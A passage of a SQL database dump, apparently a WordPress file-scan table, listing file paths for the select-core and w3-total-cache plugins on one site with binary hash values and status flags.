N ML},g','wp-content/plugins/select-core/shortcodes/progress-bar/templates/progress-bar-template.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/progress-bar/templates/progress-bar-template.php',0,'C`X l;R','C`X l;R',':ӛn(朲VyݥLID1yG\r','',0,'?'),('¦pgsBw','wp-content/plugins/select-core/shortcodes/recipe/assets/js/modules/jquery.printelement.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/recipe/assets/js/modules/jquery.printelement.min.js',0,'Eۣî,B|','Eۣî,B|','S$y{Yg#nk0~(N|`2C','',0,'?'),('Dڑʶ\rxv+SAz','wp-content/plugins/select-core/shortcodes/recipe/assets/js/modules/recipe.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/recipe/assets/js/modules/recipe.js',0,'sN+3\rۻ+^`','sN+3\rۻ+^`','B1N\nN7{J+NBת#>>Y_t','',0,'?'),('P3~ik','wp-content/plugins/select-core/shortcodes/separator/templates/separator-template.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/separator/templates/separator-template.php',0,'*8bY(Bf','*8bY(Bf','[y.ҰQ\'? E[\r8','',0,'?'),('VT{Ma6@','wp-content/plugins/select-core/shortcodes/shortcodes-functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/shortcodes-functions.php',0,'e,Pz\0','e,Pz\0','()O-T.mu5^u նK_','',0,'?'),('RO ԼrP','wp-content/plugins/select-core/shortcodes/single-image/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/single-image/functions.php',0,'<描!l','<描!l','U쉍E@m>τˎL/ .\'?','',0,'?'),('P^9mů% ^','wp-content/plugins/select-core/shortcodes/single-image/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/single-image/load.php',0,'{(}QzJ`:','{(}QzJ`:','<6© S0өS^% ','',0,'?'),(',Z9Xx濷\"','wp-content/plugins/select-core/shortcodes/single-image/single-image.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/single-image/single-image.php',0,'4.\r&e>hN','4.\r&e>hN','h-{:hU|]cެD8(ϠLl','',0,'?'),('kVԢl2wGC','wp-content/plugins/select-core/shortcodes/single-image/templates/single-image.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/single-image/templates/single-image.php',0,'lgŀ8\\-','lgŀ8\\-','YN|8vR8F[@~','',0,'?'),('ynY TzQ','wp-content/plugins/select-core/shortcodes/social-share/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/social-share/functions.php',0,'ғkvr(uI-','ғkvr(uI-','0(1Ж+w J!|TC w#','',0,'?'),('ht?S\"׏:','wp-content/plugins/select-core/shortcodes/social-share/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/social-share/load.php',0,'/ #UӮ洽|','/ #UӮ洽|','0S6L8R);1St}dv}0','',0,'?'),('(\'?`h&','wp-content/plugins/select-core/shortcodes/social-share/social-share.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/social-share/social-share.php',0,'oO4Jeƛ@ ߯','oO4Jeƛ@ ߯','=c^%1,p@?g.uSk','',0,'?'),('%=eiZ/ ','wp-content/plugins/select-core/shortcodes/social-share/templates/dropdown.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/social-share/templates/dropdown.php',0,'\'X\n','\'X\n','*r+\"\'dW\Z9Q=T[VgK','',0,'?'),('sdR+t','wp-content/plugins/select-core/shortcodes/social-share/templates/list.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/social-share/templates/list.php',0,'dSjD։jP','dSjD։jP','Jxucy\"`g3=wT(`','',0,'?'),('c]IjX','wp-content/plugins/select-core/shortcodes/social-share/templates/parts/network.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/social-share/templates/parts/network.php',0,'fZW)G:@S','fZW)G:@S','-u\\O?|)=suC9\0{W\0','',0,'?'),('r[]#^','wp-content/plugins/select-core/shortcodes/tabs/assets/js/modules/tabs.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/tabs/assets/js/modules/tabs.js',0,'ieDAe)','ieDAe)','b٦\\X9vvuo-0','',0,'?'),('\n%+B,x','wp-content/plugins/select-core/shortcodes/tabs/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/tabs/functions.php',0,'vy0Qi5C<q','vy0Qi5C<q','zVuQ-','',0,'?'),(',H߰G','wp-content/plugins/select-core/shortcodes/vertical-split-slider/assets/js/plugins/jquery.multiscroll.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/vertical-split-slider/assets/js/plugins/jquery.multiscroll.min.js',0,'r\Z۵J?L','r\Z۵J?L','i~eg64Vǫ9q','',0,'?'),('|=\r\rJ#>7','wp-content/plugins/select-core/shortcodes/vertical-split-slider/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/vertical-split-slider/functions.php',0,'I,`4-Z2ո','I,`4-Z2ո','w/\0c}v&b1V}RM2 u','',0,'?'),('|Ѓ3@U','wp-content/plugins/select-core/shortcodes/vertical-split-slider/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/vertical-split-slider/load.php',0,'\0K3kI|','\0K3kI|',':qOX+i+%+\rFAut','',0,'?'),('梆0hĢ\n','wp-content/plugins/select-core/shortcodes/vertical-split-slider/templates/vertical-split-slider-content-item-template.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/vertical-split-slider/templates/vertical-split-slider-content-item-template.php',0,'NfMo','NfMo','$3(gU:ub:=fpF?n','',0,'?'),('xњGl{~','wp-content/plugins/select-core/shortcodes/vertical-split-slider/vertical-split-slider-content-item.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/vertical-split-slider/vertical-split-slider-content-item.php',0,'UBP,4S ǖGEzvNY>','',0,'?'),('3#.zI ّX','wp-content/plugins/select-core/shortcodes/video-button/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/video-button/functions.php',0,'\ZUw1b1 \0','\ZUw1b1 \0','f,s=@*N4)mV~g?','',0,'?'),('b@0,h;\"%I','wp-content/plugins/select-core/shortcodes/video-button/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/video-button/load.php',0,' J8p u',' J8p u','p~amSeҽPˠ\'U@.-','',0,'?'),('Nn3m]A ','wp-content/plugins/select-core/shortcodes/video-button/templates/video-button.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/video-button/templates/video-button.php',0,' la;PM4',' la;PM4','ffҼ4ͥշ 9곇OSo\"','',0,'?'),('}F3Dc\rp','wp-content/plugins/select-core/shortcodes/video-button/video-button.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/shortcodes/video-button/video-button.php',0,'%)JA )s','%)JA )s','o=PP$j\rv|($+K','',0,'?'),('O G\rzh7`mR','wp-content/plugins/select-core/widgets/author-info/author-info.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/author-info/author-info.php',0,'X=\n6S','X=\n6S',')R61vAAp7W ,','',0,'?'),('ĪtCtg봙','wp-content/plugins/select-core/widgets/author-info/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/author-info/functions.php',0,'3+,ᲯD','3+,ᲯD','lY&K\\r6Bm+\Z9 =d7h','',0,'?'),('On w','wp-content/plugins/select-core/widgets/author-info/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/author-info/load.php',0,'cy\'ƌSG)','cy\'ƌSG)','@Ҫ JV6vlYŅgx(),','',0,'?'),('w_(','wp-content/plugins/select-core/widgets/blog-list-widget/blog-list.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/blog-list-widget/blog-list.php',0,'of1\"gO2=','of1\"gO2=','x<\rbp}Amv +YC','',0,'?'),('>wu:YG','wp-content/plugins/select-core/widgets/blog-list-widget/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/blog-list-widget/functions.php',0,'Qᣌ){','Qᣌ){','PRi)rE֞}l) ','',0,'?'),('4m=U','wp-content/plugins/select-core/widgets/blog-list-widget/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/blog-list-widget/load.php',0,'A \rHla6w3','A \rHla6w3','.ZEm3`4G2#:9Rs\"0','',0,'?'),('D8Юv ','wp-content/plugins/select-core/widgets/button-widget/button.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/button-widget/button.php',0,'C*$C$a҄,','C*$C$a҄,','a^6GRYrmM-Cx|.','',0,'?'),('E8u7U鸎d','wp-content/plugins/select-core/widgets/button-widget/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/button-widget/functions.php',0,'U}Dv\'','U}Dv\'','P_%Hf$|\"!}s','',0,'?'),('f Nw-lӔ`','wp-content/plugins/select-core/widgets/button-widget/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/button-widget/load.php',0,'LQy\\@.','LQy\\@.','dEkΒ:~YJBZp[\r\nNRxF','',0,'?'),('qI\\!f@a}nOe','wp-content/plugins/select-core/widgets/contact-form-7/contact-form-7.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/contact-form-7/contact-form-7.php',0,'[0,9O\n','[0,9O\n','` KP39##x%X\nsO-$]&$?','',0,'?'),(' uuѬ*','wp-content/plugins/select-core/widgets/custom-font/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/custom-font/load.php',0,' e\'r-$',' e\'r-$','4#_T5rC2.G}ryI3ci19','',0,'?'),('nq\rG\rl>\nG93<','wp-content/plugins/select-core/widgets/icon/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/icon/functions.php',0,'Msi]Ց+X','Msi]Ց+X','f gb3MC6wA΢ܨ','',0,'?'),('hcc!S6S','wp-content/plugins/select-core/widgets/icon/icon.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/icon/icon.php',0,'ӑrWr??','ӑrWr??','\r<\"eW55V#<','',0,'?'),('QxMFe⃖','wp-content/plugins/select-core/widgets/icon/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/icon/load.php',0,'$,ѝL: TveQm','$,ѝL: TveQm','l@DMuhU\'rcL#Oy9(','',0,'?'),('9D6b\"!f]','wp-content/plugins/select-core/widgets/image-gallery/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/image-gallery/functions.php',0,'OO;񵂚','OO;񵂚','7 \nO)\'BqhCU?ٚz;','',0,'?'),('l;?+|\Z\"','wp-content/plugins/select-core/widgets/image-gallery/image-gallery.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/image-gallery/image-gallery.php',0,'T-M`Gx\r','T-M`Gx\r','akUtbgwbd\nLy','',0,'?'),('~ԮWZd\Z4','wp-content/plugins/select-core/widgets/image-gallery/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/image-gallery/load.php',0,'4A˓F','4A˓F','h\Zh :\'au\'\'Kxt','',0,'?'),('i6>-D','wp-content/plugins/select-core/widgets/lib/widget-class.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/lib/widget-class.php',0,'A{,][\0m','A{,][\0m','5< \">7ylZ|𺸳\Zߛv','',0,'?'),('4zq\\\Zp|','wp-content/plugins/select-core/widgets/lib/widget-loader.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/lib/widget-loader.php',0,'9IG#a57Q=','9IG#a57Q=',' :{b3Sq,pk#ڒ','',0,'?'),(',ujhIsᐻ','wp-content/plugins/select-core/widgets/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/load.php',0,'+zCi/h','+zCi/h','XiĪNHԱs㣹;0߼2tȇieH','',0,'?'),('f:`\0W','wp-content/plugins/select-core/widgets/recent-posts/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/recent-posts/functions.php',0,'g|NP0`w','g|NP0`w','f\n.Oe8-mÀvFҎUw','',0,'?'),('|( F6~','wp-content/plugins/select-core/widgets/recent-posts/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/recent-posts/load.php',0,'-\'R','-\'R','fSk\Ztv\'E\rGJQQT yG+cr','',0,'?'),('gba;Z\"3K r','wp-content/plugins/select-core/widgets/recent-posts/recent-posts.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/recent-posts/recent-posts.php',0,'yոzpv8P&*F','yոzpv8P&*F','8qˊ`sT9܋4ߟ','',0,'?'),('f`)x\n','wp-content/plugins/select-core/widgets/search-opener/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/search-opener/functions.php',0,'!F+%k$','!F+%k$','^2aQL ֳO7Fh}aJ^w','',0,'?'),('*V~24Lb:fH','wp-content/plugins/select-core/widgets/search-opener/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/search-opener/load.php',0,'初E\rFzu','初E\rFzu','8P \\obij h8KTl2Lh','',0,'?'),('k|PdNCt[','wp-content/plugins/select-core/widgets/search-opener/search-opener.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/search-opener/search-opener.php',0,'F\"%)-M','F\"%)-M','UܭdwFpx\Z~*0}\"','',0,'?'),('fZCD<{N','wp-content/plugins/select-core/widgets/search-post-type/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/search-post-type/functions.php',0,'\Zb)ϵ>:','\Zb)ϵ>:','żkgId9K3h v\ZM}','',0,'?'),('P[Is f\rAKh','wp-content/plugins/select-core/widgets/search-post-type/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/search-post-type/load.php',0,'Ӿl+xW','Ӿl+xW','I&orj:hW 2\rJr','',0,'?'),(' i[ v.]','wp-content/plugins/select-core/widgets/search-post-type/search-post-type.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/search-post-type/search-post-type.php',0,'oIcIyL^','oIcIyL^','$ƘBfйZ1RUb+pǰ0','',0,'?'),('b\n*t(A','wp-content/plugins/select-core/widgets/separator/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/separator/functions.php',0,'s\"J&p!0 d','s\"J&p!0 d','wnx77 \'~źX6\n 9S[','',0,'?'),('lrнg','wp-content/plugins/select-core/widgets/separator/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/separator/load.php',0,'bkTO>0)','bkTO>0)','||pQaiPiω`uoiK`#\'urh{n','',0,'?'),('G o}&A54t','wp-content/plugins/select-core/widgets/separator/separator.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/separator/separator.php',0,'Ke#3VWE','Ke#3VWE','CVGor@ i\0N`p{\\B&ǎ','',0,'?'),('\\ϩiahƆ΁','wp-content/plugins/select-core/widgets/sidearea-opener/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/sidearea-opener/functions.php',0,'1 O+RY7|v4-','',0,'?'),('y4LG^ݯ9mx','wp-content/plugins/select-core/widgets/social-icon/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/social-icon/functions.php',0,'nt^Oa&}!','nt^Oa&}!','F[#}RgýźLnE\'^&','',0,'?'),('>^~9','wp-content/plugins/select-core/widgets/social-icon/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/social-icon/load.php',0,'$joP;R','$joP;R','Iq;\ZMGjSȇʨ先=γ','',0,'?'),('출,XFaE','wp-content/plugins/select-core/widgets/social-icon/social-icon.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/social-icon/social-icon.php',0,'`ӎvk-Ј9v','`ӎvk-Ј9v','umC2\'hظ꤭S,','',0,'?'),('SCہ,7Al','wp-content/plugins/select-core/widgets/social-icons-group/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/social-icons-group/functions.php',0,'ő9=X{','ő9=X{','lj\n1ˁaQM0>L\'?%','',0,'?'),('rA ,qo','wp-content/plugins/select-core/widgets/social-icons-group/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/social-icons-group/load.php',0,'3}V ;WRaR:A','3}V ;WRaR:A','\rG}5m_Ux } ޔ{Q ','',0,'?'),('X}еSćN','wp-content/plugins/select-core/widgets/social-icons-group/social-icons-group.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/social-icons-group/social-icons-group.php',0,'4sPYJ@N1','4sPYJ@N1','fb{D*Zmq`)*o76LUVk hG','',0,'?'),('wjjh郋_','wp-content/plugins/select-core/widgets/sticky-sidebar/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/sticky-sidebar/functions.php',0,'?ٶO Y߯xhE','?ٶO Y߯xhE','~tU7$ `痳<','',0,'?'),('aZ‚w?Oc2','wp-content/plugins/select-core/widgets/sticky-sidebar/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/sticky-sidebar/load.php',0,'G<[@g\Z','G<[@g\Z','pז+C^jhigj}z7','',0,'?'),('N K;)RaDIB','wp-content/plugins/select-core/widgets/sticky-sidebar/sticky-sidebar.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/sticky-sidebar/sticky-sidebar.php',0,'M9hk2H','M9hk2H','_V]B##kac-?쾡P','',0,'?'),('y\"OXR9+W@','wp-content/plugins/select-core/widgets/woocommerce-dropdown-cart/functions.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/woocommerce-dropdown-cart/functions.php',0,'(Kw/|M','(Kw/|M','-1+\\I%NHy88apI/:k','',0,'?'),('?43Y><8','wp-content/plugins/select-core/widgets/woocommerce-dropdown-cart/load.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/woocommerce-dropdown-cart/load.php',0,'Xgc)Zr','Xgc)Zr','iw:EP Y[ٜ.`l,6]','',0,'?'),('XҮa|y^E','wp-content/plugins/select-core/widgets/woocommerce-dropdown-cart/woocommerce-dropdown-cart.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/select-core/widgets/woocommerce-dropdown-cart/woocommerce-dropdown-cart.php',0,'𲏶?#\0cY','𲏶?#\0cY','Pi\"\0[sW%c~P֣7','',0,'?'),('{ǟq!u','wp-content/plugins/w3-total-cache/Base_Page_Settings.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Base_Page_Settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O#Tn׉1','ȈƉIY?o*e\\CU','',0,'?'),('C;>b:\\2\rO','wp-content/plugins/w3-total-cache/BrowserCache_ConfigLabels.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/BrowserCache_ConfigLabels.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n9mk<','c&!NmdSΏlI','',0,'?'),(' phK\\<','',0,'?'),('F|@US,yַ','wp-content/plugins/w3-total-cache/BrowserCache_Environment_Nginx.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/BrowserCache_Environment_Nginx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ĻKgl &\\rr*','OpUhP*;a)dISkHif(','',0,'?'),('ϯݒZwQx[','wp-content/plugins/w3-total-cache/BrowserCache_Page.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/BrowserCache_Page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ж!m^R=|Rd','BѶEJG\\[F}8KI\'ȴKY\"[L','',0,'?'),('q;XhEZ^','wp-content/plugins/w3-total-cache/BrowserCache_Page_View_QuickReference.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/BrowserCache_Page_View_QuickReference.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q)tRt','Xaٻv=RY~@&E\\p','',0,'?'),('I b{TDigV','wp-content/plugins/w3-total-cache/BrowserCache_Page_View_SectionSecurity.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/BrowserCache_Page_View_SectionSecurity.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\\'nJWD)V>','Bi1f^s_]灟hi#','',0,'?'),('&50','wp-content/plugins/w3-total-cache/BrowserCache_Plugin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/BrowserCache_Plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D*㔖c^','ht2!R\"n%74W8˨','',0,'?'),('>.ȽN','wp-content/plugins/w3-total-cache/BrowserCache_Plugin_Admin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/BrowserCache_Plugin_Admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qsl^T5 H','w!C#0_n)ϒ\"οO ','',0,'?'),('PCDF>@ѭ','wp-content/plugins/w3-total-cache/Cache.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!\\mX ','癵/lz>aZP݁]/Lk2d#','',0,'?'),(' ta`\Z&J','wp-content/plugins/w3-total-cache/CacheFlush.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/CacheFlush.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.9{x','+%|XQ\ntL!a6~))my','',0,'?'),('sc5pRS','wp-content/plugins/w3-total-cache/CacheFlush_Locally.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/CacheFlush_Locally.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~\'y7?','-dy+=3|h¾Wq!v$','',0,'?'),('̛f @]Aԓ 4','wp-content/plugins/w3-total-cache/CacheGroups_Plugin_Admin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/CacheGroups_Plugin_Admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(3%qA','l-vk먘‘: a&T%^h','',0,'?'),('fz)]}-','wp-content/plugins/w3-total-cache/CacheGroups_Plugin_Admin_View.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/CacheGroups_Plugin_Admin_View.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|$̉sN','M)7l5af}0JB&SS','',0,'?'),('swa#!&0W7dK','wp-content/plugins/w3-total-cache/CacheGroups_Plugin_Admin_View.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/CacheGroups_Plugin_Admin_View.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iޏo','yԶy\"f¦O%=٫-Y\'b','',0,'?'),('THlsN','wp-content/plugins/w3-total-cache/Cache_Apc.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cache_Apc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T̯5UB ؗ','_\0Pv.BqklXt2H','',0,'?'),('Yt^i','wp-content/plugins/w3-total-cache/Cache_Apcu.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cache_Apcu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';VYj5','hRo3~HeM iDy)C','',0,'?'),('/Oog/&l ','wp-content/plugins/w3-total-cache/Cache_Base.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cache_Base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_toؔ.r`','}vPZ\\Zu7;AxUD','',0,'?'),('?n@@/НyM4','wp-content/plugins/w3-total-cache/Cache_Eaccelerator.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cache_Eaccelerator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_0B!',' ZG<|zus*J{⑅/~Q','',0,'?'),('KR\r+\"!St#}','wp-content/plugins/w3-total-cache/Cache_File.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cache_File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^LCN[+&','-PӤWu<\":rnP','',0,'?'),('!# RaTH','wp-content/plugins/w3-total-cache/Cache_File_Cleaner.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cache_File_Cleaner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GOv]s\rdp','ݾXH+;Aכs\rq','',0,'?'),('uPU\0W','wp-content/plugins/w3-total-cache/Cache_File_Cleaner_Generic.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cache_File_Cleaner_Generic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%p;Lc','V*܄.IyW7_#}','',0,'?'),('1ܞT\ny(3>\Z','wp-content/plugins/w3-total-cache/Cache_File_Cleaner_Generic_HardDelete.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cache_File_Cleaner_Generic_HardDelete.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?䨀+_h`',' jYx Ī*nJO','',0,'?'),('8I[˹BO','wp-content/plugins/w3-total-cache/Cache_File_Generic.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cache_File_Generic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9ӑgY(','q?PYE#4UPBs=}=R','',0,'?'),('^Po2W','wp-content/plugins/w3-total-cache/Cache_Memcache.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cache_Memcache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4wt6K1;X','Vewb`YR:0vgcQ\r Y','',0,'?'),('lF$a K(t','wp-content/plugins/w3-total-cache/Cache_Memcached.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cache_Memcached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Tb2',')HtܴzV cGAȼ','',0,'?'),('=:SDs4','wp-content/plugins/w3-total-cache/Cache_Memcached_Stats.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cache_Memcached_Stats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S,hq^XkU','*Zٛ*uSl&C!','',0,'?'),('gW\"?}.4','wp-content/plugins/w3-total-cache/Cache_Nginx_Memcached.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cache_Nginx_Memcached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']sQ1XTIPC f','&m.P\n$C[nx$Ne','',0,'?'),('P*zA','wp-content/plugins/w3-total-cache/Cache_Redis.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cache_Redis.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WקoL','^=lh6Ԧx>s/zcN','',0,'?'),('-2\"h\"Z+KQ','wp-content/plugins/w3-total-cache/Cache_Wincache.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cache_Wincache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˨[0c0ş','KeH!;&O=N9 Y9`d','',0,'?'),('Xs[v\rͣkf','wp-content/plugins/w3-total-cache/Cache_Xcache.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/Cache_Xcache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S%cK7<','&F)_\ZLA\'SbiꓯDxdP','',0,'?'),('g_//月-w ','wp-content/plugins/w3-total-cache/CdnEngine.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/CdnEngine.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vẦSbl;','d n԰BIA:gX߻l8o','',0,'?'),('CI)\\t& phDP','wp-content/plugins/w3-total-cache/CdnEngine_Azure.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/CdnEngine_Azure.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U\0~b𱴘_\\l','7|A˸올uZomN^','',0,'?'),('V T^B89~','wp-content/plugins/w3-total-cache/CdnEngine_Base.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/CdnEngine_Base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C#(LnW\rLHi;','3\n7&V\Z`\\xR1\\*8Ũ','',0,'?'),('83zk!i@','wp-content/plugins/w3-total-cache/CdnEngine_CloudFront.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/CdnEngine_CloudFront.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>*)I\0|\"/,','&cw8Z0)lESBp','',0,'?'),('S J6O 